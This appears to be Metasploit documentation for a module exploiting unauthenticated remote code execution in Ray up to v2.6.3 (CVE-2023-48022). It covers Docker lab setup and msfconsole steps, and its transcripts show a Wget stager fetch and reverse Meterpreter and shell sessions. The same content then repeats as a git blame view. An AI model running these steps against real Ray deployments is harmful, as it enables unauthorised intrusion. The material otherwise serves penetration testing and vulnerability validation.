documentation/modules/exploit/linux/http/ray_agent_job_rce.md

## Vulnerable Application

Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint (CVE-2023-48022)

The vulnerability affects:

    * Ray (<=v2.6.3)

This module was successfully tested on:

    * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15

### Install and run the vulnerable Ray (v2.6.3)

1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
3. Pull pre-built Ray docker container (v2.6.3) in your VM.
   `docker pull rayproject/ray:2.6.3`
4. Start the ray container.
   `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
5. Start ray.
   `ray start --head --dashboard-host=0.0.0.0`

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/ray_agent_job_rce`
4. Do: `set rhost <rhost>`
5. Do: `set lhost <attacker-ip>`
6. Do: `run`
7. You should get a shell or meterpreter

## Options
No options

## Scenarios

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0)
```
msf > use exploit/linux/http/ray_agent_job_rce
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/ray_agent_job_rce) > check
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
msf exploit(linux/http/ray_agent_job_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Command execution successful. Job ID: 'raysubmit_EJDSK2BrhAP8j69n' Submission ID: 'raysubmit_EJDSK2BrhAP8j69n'
[*] Using URL: http://192.168.56.1:8080/kOZWO5HA3wWm2Hh
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /kOZWO5HA3wWm2Hh
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 192.168.56.6
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:42052) at 2024-08-10 10:45:48 +0900
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 6.6.15-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1)
```
msf > use exploit/linux/http/ray_agent_job_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/ray_agent_job_rce) > set target 1
target => 1
msf exploit(linux/http/ray_agent_job_rce) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(linux/http/ray_agent_job_rce) > check
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
msf exploit(linux/http/ray_agent_job_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Command execution successful. Job ID: 'raysubmit_RNpiJJt2feNrUrwN' Submission ID: 'raysubmit_RNpiJJt2feNrUrwN'
[*] Using URL: http://192.168.56.1:8080/QtpKXmqA8kq
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /QtpKXmqA8kq
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (36 bytes) to 192.168.56.6
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:35136) at 2024-08-10 10:47:37 +0900
[*] Server stopped.

whoami
ray
pwd
/home/ray
```
Add module docs 2024-08-10 10:59:00 +09:00			`## Vulnerable Application`

Add cve ref 2024-08-20 12:59:52 +09:00			`Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint (CVE-2023-48022)`
Add module docs 2024-08-10 10:59:00 +09:00
			`The vulnerability affects:`

			`* Ray (<=v2.6.3)`

			`This module was successfully tested on:`

			`* Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15`

			`### Install and run the vulnerable Ray (v2.6.3)`

			`1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.`
			`2. Install Kali Linux (or other Linux distro) in your virtualization engine.`
			`3. Pull pre-built Ray docker container (v2.6.3) in your VM.`
			`docker pull rayproject/ray:2.6.3`
			`4. Start the ray container.`
			`docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
			`5. Start ray.`
			`ray start --head --dashboard-host=0.0.0.0`

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: `use exploit/linux/http/ray_agent_job_rce`
			4. Do: `set rhost <rhost>`
			5. Do: `set lhost <attacker-ip>`
			6. Do: `run`
			`7. You should get a shell or meterpreter`

			`## Options`
Update document 2024-08-16 08:56:01 +09:00			`No options`
Add module docs 2024-08-10 10:59:00 +09:00
			`## Scenarios`

			`### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0)`
			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > use exploit/linux/http/ray_agent_job_rce`
Add module docs 2024-08-10 10:59:00 +09:00			`[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6`
Add module docs 2024-08-10 10:59:00 +09:00			`rhost => 192.168.56.6`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1`
Add module docs 2024-08-10 10:59:00 +09:00			`lhost => 192.168.56.1`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/ray_agent_job_rce) > check`
Add module docs 2024-08-10 10:59:00 +09:00			`[*] 192.168.56.6:8265 - The service is running, but could not be validated.`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/ray_agent_job_rce) > run`
Add module docs 2024-08-10 10:59:00 +09:00
			`[*] Started reverse TCP handler on 192.168.56.1:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[!] The service is running, but could not be validated.`
			`[+] Command execution successful. Job ID: 'raysubmit_EJDSK2BrhAP8j69n' Submission ID: 'raysubmit_EJDSK2BrhAP8j69n'`
			`[*] Using URL: http://192.168.56.1:8080/kOZWO5HA3wWm2Hh`
			`[*] Command Stager progress - 100.00% done (120/120 bytes)`
			`[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /kOZWO5HA3wWm2Hh`
			`[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))`
			`[*] Sending stage (3045380 bytes) to 192.168.56.6`
			`[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:42052) at 2024-08-10 10:45:48 +0900`
			`[*] Server stopped.`

			`meterpreter > sysinfo`
			`Computer : 172.17.0.2`
			`OS : Ubuntu 20.04 (Linux 6.6.15-amd64)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			```

			`### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1)`
			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > use exploit/linux/http/ray_agent_job_rce`
Add module docs 2024-08-10 10:59:00 +09:00			`[*] Using configured payload linux/x64/meterpreter/reverse_tcp`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6`
Add module docs 2024-08-10 10:59:00 +09:00			`rhost => 192.168.56.6`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1`
Add module docs 2024-08-10 10:59:00 +09:00			`lhost => 192.168.56.1`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/ray_agent_job_rce) > set target 1`
Add module docs 2024-08-10 10:59:00 +09:00			`target => 1`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/ray_agent_job_rce) > set payload linux/x86/shell/reverse_tcp`
Add module docs 2024-08-10 10:59:00 +09:00			`payload => linux/x86/shell/reverse_tcp`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/ray_agent_job_rce) > check`
Add module docs 2024-08-10 10:59:00 +09:00			`[*] 192.168.56.6:8265 - The service is running, but could not be validated.`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/ray_agent_job_rce) > run`
Add module docs 2024-08-10 10:59:00 +09:00
			`[*] Started reverse TCP handler on 192.168.56.1:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[!] The service is running, but could not be validated.`
			`[+] Command execution successful. Job ID: 'raysubmit_RNpiJJt2feNrUrwN' Submission ID: 'raysubmit_RNpiJJt2feNrUrwN'`
			`[*] Using URL: http://192.168.56.1:8080/QtpKXmqA8kq`
			`[*] Command Stager progress - 100.00% done (116/116 bytes)`
			`[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /QtpKXmqA8kq`
			`[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))`
			`[*] Sending stage (36 bytes) to 192.168.56.6`
			`[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:35136) at 2024-08-10 10:47:37 +0900`
			`[*] Server stopped.`

			`whoami`
			`ray`
			`pwd`
			`/home/ray`
			```